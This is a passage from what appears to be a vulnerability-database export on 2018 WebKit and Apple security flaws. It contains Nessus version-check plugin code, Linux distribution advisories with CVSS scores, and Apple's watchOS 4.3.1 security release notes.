script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfix = \"10.13.5\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:50:43", "description": "The remote host is affected by the vulnerability described in GLSA-201808-04 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.\n Impact :\n\n A remote attacker could execute arbitrary commands or cause a denial of service condition via a maliciously crafted web content.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "GLSA-201808-04 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12293", "CVE-2018-12294", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4261", "CVE-2018-4262", "CVE-2018-4263", "CVE-2018-4264", "CVE-2018-4265", "CVE-2018-4266", "CVE-2018-4267", "CVE-2018-4270", "CVE-2018-4272", "CVE-2018-4273", "CVE-2018-4278", "CVE-2018-4284"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201808-04.NASL", "href": "https://www.tenable.com/plugins/nessus/112078", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201808-04.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112078);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12293\", \"CVE-2018-12294\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4192\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4201\", \"CVE-2018-4204\", \"CVE-2018-4214\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4261\", \"CVE-2018-4262\", \"CVE-2018-4263\", \"CVE-2018-4264\", \"CVE-2018-4265\", \"CVE-2018-4266\", \"CVE-2018-4267\", \"CVE-2018-4270\", \"CVE-2018-4272\", \"CVE-2018-4273\", \"CVE-2018-4278\", \"CVE-2018-4284\");\n script_xref(name:\"GLSA\", value:\"201808-04\");\n\n script_name(english:\"GLSA-201808-04 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201808-04\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the referenced CVE identifiers for details.\n \nImpact :\n\n A remote attacker could execute arbitrary commands or cause a denial of\n service condition via a maliciously crafted web content.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0006.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201808-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.20.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.20.4\"), vulnerable:make_list(\"lt 2.20.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebkitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T11:57:19", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-18T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2018-12293", "CVE-2018-4218", "CVE-2018-4190", "CVE-2018-4222", "CVE-2018-4199", "CVE-2018-4232"], "modified": "2018-06-18T00:00:00", "id": "USN-3687-1", "href": "https://ubuntu.com/security/notices/USN-3687-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKit2 based WebKitGTK+ for GTK+ 3. ", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-16T20:20:25", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: webkit2gtk3-2.20.3-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2018-06-16T20:20:25", "id": "FEDORA:A7C5B60D2E0C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-29T08:06:09", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.20.3-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2018-06-29T08:06:09", "id": "FEDORA:EC42160A1040", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.20.3, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-07-01T17:17:14", "type": "mageia", "title": "Updated webkit2 packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2018-07-01T17:17:14", "id": "MGASA-2018-0302", "href": "https://advisories.mageia.org/MGASA-2018-0302.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2020-12-24T20:41:19", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.3.1\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nNot impacted: Apple Watch Series 3\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Crash Reporter**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:38:09", "title": "About the security content of watchOS 4.3.1 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4187", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4243", "CVE-2018-4226"], "modified": "2019-10-08T03:38:09", "id": "APPLE:HT208851", "href": "https://support.apple.com/kb/HT208851", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T03:29:29", "description": "# About the security content of watchOS 4.3.1\n\nThis document describes the security content of watchOS 4.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.3.1\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nNot impacted: Apple Watch Series 3\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Crash Reporter**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of 